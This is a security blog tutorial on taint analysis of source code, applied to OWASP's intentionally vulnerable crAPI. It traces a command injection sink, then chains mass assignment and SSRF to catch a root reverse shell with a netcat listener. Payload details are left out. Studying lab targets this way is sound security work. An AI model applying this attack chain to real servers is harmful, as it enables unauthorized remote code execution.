Tracing API exploitability through code review and taint analysis

It’s not uncommon to find yourself with access to the source code of an API. Whether you’re looking at an open-source project or a proprietary one you’ve decompiled, there may be times when you need to evaluate the security of the API by looking at the code.

In this article, we’ll look at how to leverage the concepts of sources and sinks to conduct taint analysis to find exploitable vulnerabilities in your APIs quickly. In fact, I will do this on our favorite API, OWASP’s completely ridiculous API (crAPI), to give you a real-world example.

We aren’t going to look for the simple OWASP API Security Top 10 stuff… but instead, build an attack chain that will lead to a reverse shell and a foothold on the identity server of crAPI.

Let’s go have some fun!

Getting the source code of your API

The first step in any form of taint analysis is to gain access to the source code.

In our case, OWASP publishes the source code to crAPI on GitHub. So we can just check it out with git.

But what if we didn’t have access to the source directly? How else could we get the code?

Gaining access to the API binaries

When you don’t have access to the API source itself, maybe you can get access to the compiled or deployed code. This might be actual binaries, managed .NET DLLs, or Java JAR / WAR files. It could even be raw PHP, Python, or Javascript (think NodeJS) files.

In any case, there are a few ways you can collect the API artifacts:

Deploy the application to virtual machines (VMs) through a cloud marketplace like Amazon or Azure. When app vendors make their apps and APIs accessible through an app catalog, you can deploy it into your own cloud environment and then get terminal access to the VM(s) to access the files directly.
If you can’t find the API in an app catalog, you could request a trial version of the software. Sometimes it’s easy to just fill in a form and get access to an installable version. I’m not a big fan of this method, as it puts you in a sales funnel when you have no intention to buy. It’s a waste of time for both you and the sales team.
You can hire a freelancer to install the app for you and send you the binaries. You’d be surprised how many people are on sites like Fiverr or Upwork and willing to do the heavy lifting. Look for freelancers with experience in the software; they probably have access to the files already.
Check if you can get deployable versions of the API in a container registry like DockerHub. It’s not uncommon, especially for open-source commercial projects, to find containers you can pull down directly. If not from the original maintainers, from someone who has built their own custom configuration. Once you have the containers downloaded locally you can deploy an instance, attach and get direct access to the files.

Once you have the API artifacts, you can then use a decompiler to get a readable form of the source code.

An introduction to “sources” and “sinks”

I think the reverse engineering gurus on the Internet like to overcomplicate things. Let’s break with tradition and give a simple and practical explanation of what sources and sinks are.

A source is simply any data input you as an attacker can manipulate. This could be data from a file, the network, or directly from the user.

A sink is anything that processes that data. This is usually a dangerous function that doesn’t handle the data very well, allowing us to make the code do things it isn’t supposed to.

You’ve seen this before. Basic buffer overflows in the C programming language have used sources and sinks for decades. A source might be some user input into the application, which is then processed by a dangerous function like strcpy(), our sink in the equation. If the input is larger than the buffer strcpy() is copying bytes to, you get an overflow, allowing us to manipulate memory and possibly change the code execution path to run our exploit.

In the world of APIs, looking for dangerous sinks is very much language-dependent. Luckily for us, a lot of research has already been done in this field of research. In fact, there is an awesome database of dangerous sink signatures maintained by Eldar Marcussen (aka wireghoul) in the graudit project.

TIP: If you decide to use the graudit signatures, always start by looking for the fruit.db for the language. This contains the most common (aka low-hanging fruit) signatures of dangerous sinks for that language.

In data flow analysis, the source is the start of the data flow, and the sink is the end. Our goal is to connect the sources and sinks together by following how the tainted data flows through the API.

Personally, I like to work backwards. I detect a dangerous sink first and then trace back through the code to find where data I can manipulate (aka taint) enter into the API.

Let me show you how.

Taint Analysis of crAPI

For the rest of this article, I am going to walk you through the actual approach I used to find a command injection vulnerability that exposes a remote code execution (RCE) bug in crAPI that leads to a reverse shell on the identity server of the API.

This methodology is what I always do as a first pass when I get access to source code. There are definitely more thorough and complex ways to accomplish this; I balance effort and time investment against the potential gains.

YMMV. This is just my approach.

Finding the dangerous sink

So the first step is to decide where in crAPI to do the analysis. While auditing all the code is possible, it’s not practical, especially in larger code bases.

We want to be strategic and focus on the areas that give us the biggest “bang for our buck”… so to speak.

As we’ve already done a pretty thorough app walkthrough for crAPI in other articles, I know a majority of the API I want to tackle exists in the Java source code that can be found at /crAPI/services/identity/src.

So the first thing to do is search for all possible dangerous sinks based on the Java language. Years ago, I would just use a bash script that would loop through a wordlist of dangerous sinks and grep through the source code. However, these days we can use graudit to do all the heavy lifting for us.

Here is the command to use to have graudit scan the Java codebase looking for dangerous sinks:

$ graudit -d java -L .

Let’s breakdown the args of the call:

-d java : Tells graudit to load the database of dangerous sinks for java
-L : Tells graudit to display vim-friendly line numbers (more about this in a moment)
. : Tells graudit to search through all files from the current location. You could use a relative or absolute path to a different directory if you like.

Once executed, graudit will scan all the Java source code and output anything that matches the dangerous sink database. As we look through the results, we can quickly see a perfect candidate:

Experience is helpful here. I know that calls to exec() can lead to remote code execution, which is why it sticks out so quickly for me. With over 400 other findings in just this part of the codebase, you can see why it’s essential to try to isolate the areas of the API code you want to review.

Anyways, let’s explore that exec call in more detail. By using the -L argument, the output includes vim-friendly line numbers, which means I can open up the source code right to the suspicious line I want to audit:

$ vi ./main/java/com/crapi/utils/BashCommand.java +46

If we look at the code, we can see the dangerous sink is found in a function called executeBashCommand(). We can also see that the code constructs the call to exec() by taking whatever parameter is passed into the function and constructing the equivalent of bash -c <command>.

This is an ideal candidate for a traditional command injection vulnerability.

Time to trace backward and find a way to call this function!

Tracing the data flow to executeBashCommand()

So where in the code is executeBashCommand() called? Time for a bit of grep:

$ grep -R -n executeBashCommand

It appears from the results that this function is called in ProfileServiceImpl.java. Let’s check it out.

TIP: grep isn’t as friendly with the line numbers when using the -n argument as graudit is with -L. As such, we need to replace the first colon with a space and then the + sign to tell vi to open the file to the offending line of code. No biggy. Big timesaver though, rather than having to scroll through hundreds of lines of code to find it otherwise.

$ vi ./main/java/com/crapi/service/Impl/ProfileServiceImpl.java +242

We can see that the code is deep in a conditional block of code of a function called convertVideo(). We can also see that the data comes from profileVideo.getConversion_params().

This is important. If we look closely at the code, we can see that profileVideo is an entity of ProfileVideo (/crAPI/services/identity/src/main/java/com/crapi/entity/ProfileVideo.java). We can also see that getConversion_params() returns an internal variable called conversion_params. If we look at the entity code closer, we can see we can set that variable if we can call setConversion_params().

So now we have two different things to trace. We first need to figure out how to call setConversion_params(), so we can taint the input. We then need to figure out how to call convertVideo() to trigger the dangerous sink.

We’re making progress! Still with me? OK, let’s figure out how to taint the conversion_params.

Tracing the data flow to setConversion_params()

Time for a bit more grep-fu:

$ grep -R -n 'setConversion_params'

We can ignore all the tests returned. That leaves us with two candidates to check – both in ProfileServiceImpl.java.

When we check the first one, we see it enters a function called uploadProfileVideo().

After closer observation, we can see that we can’t modify the input there to taint the data. It hardcodes the value to “-v codec h264“. So we can stop looking here.

Let’s check the other candidate.

$ vi ./main/java/com/crapi/service/Impl/ProfileServiceImpl.java +150

Bingo. If we can find a way to call updateProfileVideo(), we can taint the data that executeBashCommand() will use in the dangerous sink to exec() by simply setting the value.

Tracing the data flow to updateProfileVideo()

Let’s grep some more:

$ grep -R -n 'updateProfileVideo'

Ignoring the test files, we see only one candidate in ProfileController.java on line 100:

$ vi ./main/java/com/crapi/controller/ProfileController.java +100

Got it! There is a public endpoint at /api/v2/user/videos/{video_id}. That’s our entry point for our source. If we can set the conversion_params in the body of the PUT, we can set the variable that convertVideo() will use.

Only one thing left to figure out. How do we call convertVideo() once we taint the conversion_params?

Tracing the data flow to convertVideo()

One last grep:

$ grep -R -n 'convertVideo'

We see one candidate in ProfileController.java on line 148. Let’s check it out.

$ vi ./main/java/com/crapi/controller/ProfileController.java + 148

Haha! It looks like it’s a GET endpoint at /api/v2/user/videos/convert_video. The endpoint has a query parameter called video_id.

I think that’s everything we will need to construct our attack.

It’s taken me a few minutes to document this for the article, but when I did the initial taint analysis it took me less than 15 minutes to follow the sink back to the source. With practice, you’ll be able to do that too… if not faster.

Planning out our attack chain

OK, here is what we know:

We have to upload a profile video. During the app walkthrough, we saw we could do that in the my-profile section of the app.
We then need to update the profile video and set the conversion_params with the command we want to run on the server. We must remember that this is a blind command injection (we won’t see any results from the command returned as it’s executed later), so we will need it to call back to us somehow. We could possibly use Burp Collaborator for this, but since I am running this locally using Docker and controlling all the infrastructure, I’ll construct a reverse shell payload and catch it with netcat.
Once we have set the payload, we need to call convertVideo() to execute it.

It seems simple enough. Let’s load up Burp and give it a try.

Executing our attack

With Burp loaded, we can log into the crAPI app and click on our icon on the top right. We’re ready to go.

Step 1 – Upload profile video

To upload the video we hit the three vertical ellipses menu and select to upload the video. When complete, we get a response with info about the video.

We can see we have successfully uploaded our profile video. Notice the response… we can see the id of the video, which we will need later, as well as the first look at the conversion_params with the hardcoded value we detected during analysis.

Step 2 – Update profile video

To update the video, let’s start by changing the video name by clicking the three vertical ellipses menu and selecting “Change Video Name.” It will send a PUT request to the /api/v2/user/videos/{video_id} endpoint.

Here is the first vulnerability we can take advantage of. When I sent the request through the browser, it only sent a body with the videoName property set. However, during code analysis, we saw that the function actually takes a VideoForm data model… which can ALSO include the conversion_params property.

This is a PERFECT example of a mass assignment vulnerability. We can taint the object by simply adding in the conversion_params property. In my case, I will inject a simple reverse shell using bash. How to create reverse shell payloads is beyond this article; if you want to learn more, I suggest you check out one of the great rooms on TryHackMe.

Anyways… here goes…

Perfect. We can see the update worked, and our payload is in the conversion_params field.

Time to trigger it!

Step 3 – Trigger reverse shell by calling convertVideo()

So there is no UI in the crAPI web app that calls this endpoint. But we can just as easily craft one in Burp. So I send a GET request from another call to the Repeater tab and modify it to send to /api/v2/user/videos/convert_video?video_id=27.

On my local machine, I set up a netcat listener and wait for the crAPI server to call back to me:

$ nc -nlp 4242

Time to trigger the reverse shell…

WTF? It didn’t work. We get a 403 response with a message that the endpoint should be accessed only internally. It also says that the endpoint is actually at http://crapi-identity:8080/identity/api/v2/user/videos/convert_video.

Damn it. It was too good to be true. It looks like we need to find a way to call this internally. From an attacker’s perspective, this is called a server-side request forgery (SSRF) attack.

FUNNY SIDE NOTE: Always read error responses closely. I didn’t notice it until I was writing this article and looking at the screenshots, but the devs hinted that you should use SSRF in the way they spelled out the error message. I missed that originally. I knew what to do because it told us the endpoint could only be called internally.

Anyways, let’s go hunting for the SSRF.

Step 4 – Trigger reverse shell by calling convertVideo() using SSRF

OK, so admittedly, this took me a bit to find. Looking for SSRF isn’t trivial. You have to look for code that runs on the server that makes a request that we can manipulate by changing the URL to point to the internal convertVideo endpoint.

In my case, I had already documented an interesting finding in the workshop API for merchants. At the /workshop/api/merchant/contact_mechanic endpoint, you can set the mechanic_api property during a POST. That should work perfectly. We can set it to http://crapi-identity:8080/identity/api/v2/user/videos/convert_video?video_id=27, which will then trigger the call from the workshop API to the identity API.

Let’s give it a try:

After a period of time, the server will return with a 504 Gateway Timed Out error. However, check your netcat listener…

Bingo! Even though the API call timed out, our malicious payload was executed. We have our reverse shell… as root on the identity server!

Conclusion

What a trip! Getting remote code execution and catching reverse shells from an API server is a pretty critical finding. Always a lot of fun when we can manipulate an API like this.

From here, it would be pretty easy to write a bash script that could completely pwn any crAPI server in a single exploit PoC script and get you a shell on the server. Well, to the identity server container at least.

You can check out my article on exploiting APIs with cURL for a good starting point PoC script that you can modify to do just that.

Have fun with it. Practice. Pwn all the things.